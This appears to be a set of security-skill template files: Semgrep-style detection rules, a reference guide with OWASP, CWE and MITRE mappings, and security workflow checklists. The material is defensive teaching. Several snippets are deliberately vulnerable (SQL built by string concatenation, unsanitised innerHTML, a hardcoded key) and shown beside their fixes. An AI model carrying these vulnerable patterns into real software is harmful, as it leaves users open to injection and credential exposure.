# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
// - Direct DOM manipulation (innerHTML, document.write)
// - React dangerouslySetInnerHTML with user data
// - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
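Framework mappings are easiest to apply consistently when findings carry them as structured fields. A minimal sketch of such a finding record (the field names are illustrative, not a required schema):
```python
# Illustrative finding record carrying OWASP and CWE mappings (not a required schema).
from dataclasses import dataclass, field

@dataclass
class Finding:
    title: str
    severity: str                         # CRITICAL | HIGH | MEDIUM | LOW | INFO
    owasp: list[str] = field(default_factory=list)
    cwe: list[str] = field(default_factory=list)
    location: str = ""

finding = Finding(
    title="SQL injection in user lookup",
    severity="HIGH",
    owasp=["A03:2021 - Injection"],
    cwe=["CWE-89"],
    location="app/db.py:42",
)
print(f"[{finding.severity}] {finding.title} ({', '.join(finding.owasp + finding.cwe)})")
```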
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
Send the policy as an HTTP response header:
```http
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
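In server-side frameworks the header can be set centrally. A minimal sketch, assuming Flask (nonce handling is simplified for illustration):
```python
# Minimal sketch: attach a CSP header to every Flask response.
# In practice, generate the nonce before rendering and reuse it in <script nonce="...">.
import secrets
from flask import Flask

app = Flask(__name__)

@app.after_request
def set_csp(response):
    nonce = secrets.token_urlsafe(16)
    response.headers["Content-Security-Policy"] = (
        f"default-src 'self'; script-src 'self' 'nonce-{nonce}'"
    )
    return response
```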
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator (a scoring helper sketch follows this list)
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
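A small helper for the CVSS-to-priority mapping in step 2; the thresholds mirror the list above, so adjust them to your own SLA policy:
```python
# Map a CVSS base score to a remediation priority and SLA
# (thresholds taken from the workflow above; adjust to your policy).
def cvss_priority(score: float) -> tuple[str, str]:
    if score >= 9.0:
        return "Critical", "immediate action"
    if score >= 7.0:
        return "High", "action within 24h"
    if score >= 4.0:
        return "Medium", "action within 1 week"
    return "Low", "action within 30 days"

print(cvss_priority(8.1))  # ('High', 'action within 24h')
```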
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
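A minimal sketch of the validation step in this loop. It invokes the `./scripts/validate_config.py` referenced above; the `ERROR:`/`WARNING:` output convention and non-zero exit on failure are assumptions for illustration:
```python
# Hypothetical wrapper around the validator CLI; its output format is assumed.
import subprocess
import sys

def validate(config_path: str) -> bool:
    result = subprocess.run(
        [sys.executable, "./scripts/validate_config.py", config_path],
        capture_output=True, text=True,
    )
    lines = result.stdout.splitlines()
    errors = [l for l in lines if l.startswith("ERROR:")]
    warnings = [l for l in lines if l.startswith("WARNING:")]
    for line in errors + warnings:
        print(line)
    return result.returncode == 0 and not errors

if __name__ == "__main__":
    if not validate(sys.argv[1]):
        sys.exit(1)  # fix the reported issues, then re-run
```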
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel (a minimal orchestration sketch follows the checklist):
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
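A minimal orchestration sketch for running independent scanners concurrently; the commands shown are placeholders, so substitute your own invocations and output paths:
```python
# Run independent scanners concurrently and collect an exit status per tool.
# Commands are placeholders; substitute your actual scanner invocations.
from concurrent.futures import ThreadPoolExecutor
import subprocess

SCANS = {
    "sast": ["semgrep", "--config=auto", "--json", "-o", "sast.json", "."],
    "secrets": ["gitleaks", "detect", "--report-path", "gitleaks.json"],
    "deps": ["safety", "check", "--json", "--output", "safety.json"],
}

def run(name, cmd):
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return name, proc.returncode

with ThreadPoolExecutor(max_workers=len(SCANS)) as pool:
    results = dict(pool.map(lambda kv: run(*kv), SCANS.items()))

print(results)  # e.g. {'sast': 0, 'secrets': 1, 'deps': 0}
```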
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
